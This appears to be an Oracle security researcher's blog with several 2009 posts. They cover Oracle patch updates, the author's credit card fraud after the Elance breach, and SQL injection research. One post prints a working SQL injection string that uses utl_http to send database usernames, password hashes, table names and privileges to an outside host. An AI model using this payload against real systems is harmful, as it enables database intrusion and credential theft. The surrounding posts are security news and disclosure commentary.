Today Eric Maurice from Oracle Global Product Security released an interesting article about „Ensuring Critical Patch Update Quality„. He explains the entire test process, timeline (e.g. 15 weeks before the CPU is released the fixes will be selected), ….
Article about Oracle CPU Quality
Juli 24th, 2009Elance.com was hacked and my creditcard was stolen and abused
Juli 20th, 2009This time I am writing this blog entry as a victim…
My data (including my creditcard number) was stolen from the website elance.com. 24 hours later my creditcard number as abused. Luckily the criminals did a test booking for approx. 1 USD (in a webshop in the US) and the fraud detection team from Mastercard immediately locked my creditcard.
Here the short history:
Last friday, 18 July 2009, I received an email from Elance.com:
We recently learned that certain Elance user information was accessed without authorization, including potentially yours. The data accessed was contact information — specifically name, email address, telephone number, city location and Elance login information (passwords were protected with encryption). This incident did NOT involve any credit card, bank account, social security or tax ID numbers.
We have remedied the cause of the breach and are working with appropriate authorities. We have also implemented additional security measures and have strengthened password requirements to protect all of our users.
We sincerely regret any inconvenience or disruption this may cause.
If you have any unanswered questions and for ongoing information about this matter, please visit this page in our Trust & Safety center: http://www.elance.com/p/trust/account_security.html
For information on re-setting your password, visit: http://help.elance.com/forums/30969/entries/47262
Thank you for your understanding,
Michael Culver
Vice President
Elance
I thought: „Good to know that this happened. My creditcard information is not affected.“
20. july – Monday morning: I tried to buy some gasoline. This was not possible because my card was not accepted: „Errorcode 02“ . I payed with a different card and called the lufthansa mastercard service. They explained me that someone tried to buy something for 1 USD in Arizona and Mastercard has locked my card…
I will get a new creditcard within the next few days.
20. july – Noon: At home I read the email from elance again and I was really pissed off (passwords encrypted and not hashed) that they lied in the previous email. Send an email to elance.com (ticket#20836) and asked for details of this break-in. No answer so far…
will be continued….
Oracle CPU July 2009 published
Juli 15th, 2009Yesterday night Oracle released the July 2009 CPU. This CPU contains 30 fixes for several Oracle products. 10 security issues are fixed in the Oracle Database Server.As always the usual suspects (Esteban, David, Joxean, Alexandr, Dennis) and a few others reported issues in Oracle products.
The 3 most critical bugs this time are related to the TNS Listener and one of the bugs be exploited without authentication.These issues CVE-2009-1020, CVE-2009-1019, CVE-2009-1963 are rated with CVSS 9 (for Windows), 7.5 for Unix.
Oracle has also fixed 3 of my findings in the database (3 out of 10 :-))
- SQL Injection in DBMS_EXPORT_EXTENSION (previously fixed in April 2006)
- Information Disclosure (Password Hash) in Database Vault
- Information Disclosure (Password Hash) in Audit Vault
More details will be published within the next few days. The updates for our Oracle database scanner Repscan (free trial available) will be released within the next 2 days.
Presentation from Confidence 2009 available
Mai 16th, 2009I just uploaded the presentation „SQL Injection in Oracle Webapps“ to our website. This presentation describes the basics of SQL, different exploitation techniques (inband, out-of-band, blind), how to search creditcard numbers in the database (using dbms_xmlgen), …Here is one of the sample SQL Injection strings from the presentation. With this SQL Injection string we are getting all username/passwords, all table names, all column names and all privileges in one step. The trick is to use sum(length(utl_http())) in the SELECT clause.
http://victim.com/order.jsp?id=17‚ or 1=((select
sum(length(utl_http.request(‚http://www.orasploit.com/’||
username||’=’||password) from dba_users)))+((select
sum(utl_http.request(‚http://www. orasploit.com/’||
owner||’=’||table_name) from dba_tables))+((select
sum(length(utl_http.request(‚http://www.orasploit.com/’||
owner||’=’||table_name||’=’||column_name)) from dba_users))
+((select sum(length(utl_http.request(‚http://
www.orasploit.com/’||grantee||’=’||granted_role) from
dba_role_privs)))+((select
sum(length(utl_http.request(‚http://www.orasploit.com/’||
grantee||’=’||owner||’=’||table_name||’=’||privilege||’=’||
grantable) from dba_tab_privs)))–
Perl – Script to run OS commands via Oracle based Web Apps released
Mai 1st, 2009Sumit Siddarth from www.notsosecure.com has released a small perl script to run OS commands via Oracle based Web Apps. Sumit is using the bug in dbms_export_extension. This problem was fixed with CPU July 2006 but all databases without this (or higher CPU or patchset) are affected (Oracle 8.1.7.4, 9.2.0.1 – 9.2.0.7, 10.1.0.2 – 10.1.0.4, 10.2.0.1-10.2.0.2, XE) . More details are available in my updated tutorial.
I tested the script together with him against several of my test database.

The script is easy to use. Under MacOS I had to install p5-libwww-perl to run it.
At the moment the script does not work against Oracle databases without java but I am sure sooner or later this will be changed. In my opinion the most generic way to run OS commands (as user Oracle) is PL/SQL native (Oracle 9i, Oracle 10g/11g).